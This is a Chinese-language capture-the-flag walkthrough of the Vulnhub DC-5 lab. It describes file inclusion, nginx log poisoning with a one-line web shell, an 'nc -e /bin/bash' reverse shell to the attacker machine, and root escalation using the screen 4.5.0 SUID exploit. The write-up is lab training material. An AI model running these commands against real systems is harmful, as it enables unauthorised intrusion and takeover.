Vulnhub靶机:DC-5

访客 319 0
本文来源:aurorali

下载环境导入靶机,在kali里面扫描靶机ip地址Vulnhub靶机:DC-5-第1张图片-网盾网络安全培训靶机IP:192.168.190.133

扫描端口:Vulnhub靶机:DC-5-第2张图片-网盾网络安全培训开放了两个tcp端口,我们访问一下ipVulnhub靶机:DC-5-第3张图片-网盾网络安全培训在下载靶机的时候说明了只有一个flag,我们在页面试试,发现contact页面评论后会出现thankyou.phpVulnhub靶机:DC-5-第4张图片-网盾网络安全培训而且每次刷新下方的显示不同,扫描一下后台Vulnhub靶机:DC-5-第5张图片-网盾网络安全培训访问footer.phpVulnhub靶机:DC-5-第6张图片-网盾网络安全培训同样是每次刷新后内容不同,那猜测下方的年份显示可能是调用文件后返回的数值,尝试一下文件包含,发现成功文件包含Vulnhub靶机:DC-5-第7张图片-网盾网络安全培训因为靶机服务扫描时发现靶机网站使用的是nginx服务器,我们知道nginx服务器的默认配置文件是/etc/nginx/nginx.conf,所以将nginx的配置文件包含过来查看日志路径,发现了nginx的日志路径: access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log;Vulnhub靶机:DC-5-第8张图片-网盾网络安全培训向日志文件传输一句话木马让其进行解析,使用burpsuite抓包改包向日志文件传入一句话木马Vulnhub靶机:DC-5-第9张图片-网盾网络安全培训使用蚁剑连接Vulnhub靶机:DC-5-第10张图片-网盾网络安全培训Vulnhub靶机:DC-5-第11张图片-网盾网络安全培训使用虚拟终端反弹shell,蚁剑虚拟终端输入nc -e  /bin/bash 192.168.190.133(kali ip地址) 777,kali监听7777 端口Vulnhub靶机:DC-5-第12张图片-网盾网络安全培训

切换shell外壳

python -c 'import pty;pty.spawn("/bin/bash")'

然后进行提权,使用命令find / -user root -perm -4000 -print 2>/dev/null,查看是否有可利用的suid

Vulnhub靶机:DC-5-第13张图片-网盾网络安全培训这里不知道哪个有用就看了大佬们的wp,发现screen-4.5.0有漏洞可以利用,使用命令:searchsploit screen 4.5.0Vulnhub靶机:DC-5-第14张图片-网盾网络安全培训将文件cp出来Vulnhub靶机:DC-5-第15张图片-网盾网络安全培训41154.sh:Vulnhub靶机:DC-5-第16张图片-网盾网络安全培训查看文件可以知道,脚本文件需要分3个步骤完成
第一步:将第一部分diam写入libhax.c文件中,在执行相应的命令生成libhax.so文件Vulnhub靶机:DC-5-第17张图片-网盾网络安全培训Vulnhub靶机:DC-5-第18张图片-网盾网络安全培训第二步:将第二部分的C语言代码写入rootshell文件中,并编译成rooshell文件Vulnhub靶机:DC-5-第19张图片-网盾网络安全培训第三步:将剩下部分的脚本代码写入到dc5.sh文件中,在开头加上#!/bin/bash注明执行环境,保存需要输入为set ff=unix,是为了防止脚本的格式错误Vulnhub靶机:DC-5-第20张图片-网盾网络安全培训查看dc5.sh文件并加上可执行权限Vulnhub靶机:DC-5-第21张图片-网盾网络安全培训将生成的三个文件通过蚁剑上传到根目录下的/tmp/下Vulnhub靶机:DC-5-第22张图片-网盾网络安全培训然后在反弹shell中使用命令执行dc5.sh文件,命令chmod +x dc5.sh增加可执行权限,执行文件Vulnhub靶机:DC-5-第23张图片-网盾网络安全培训查看权限:Vulnhub靶机:DC-5-第24张图片-网盾网络安全培训切换到/root下拿到flag:Vulnhub靶机:DC-5-第25张图片-网盾网络安全培训

标签: 渗透测试 web安全 网络安全技术

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~